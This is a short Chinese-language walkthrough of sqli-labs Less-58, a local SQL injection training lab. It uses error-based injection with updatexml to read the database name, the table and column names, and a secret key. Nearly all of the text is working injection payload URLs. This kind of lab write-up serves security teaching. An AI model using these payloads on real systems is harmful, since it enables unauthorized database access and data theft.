sqli-labs (less-58)

进入58关，输入id=1

这里竟然只有5次机会，经过我的多次尝试，这里使用union注入是行不通的，因为你不管怎么构造union语句他返回的用于就是用户名和密码的值

http://127.0.0.1/sql1/Less-58/?id=1' 

根据错误显示判断闭合方式为’–+，并且为字符型注入，因为这里有完整的报错信息，所以可以使用报错注入攻击

查看当前库

http://127.0.0.1/sql1/Less-58/?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),1)--+

查看challenges库下的所有表

http://127.0.0.1/sql1/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

查看bpnaqgbroo表下的所有字段

http://127.0.0.1/sql1/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='bpnaqgbroo'),0x7e),1)--+

查看secret_MV6Q字段下的值

http://127.0.0.1/sql1/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_MV6Q) from challenges.bpnaqgbroo),0x7e),1)--+

将查询到的KEY提交


成功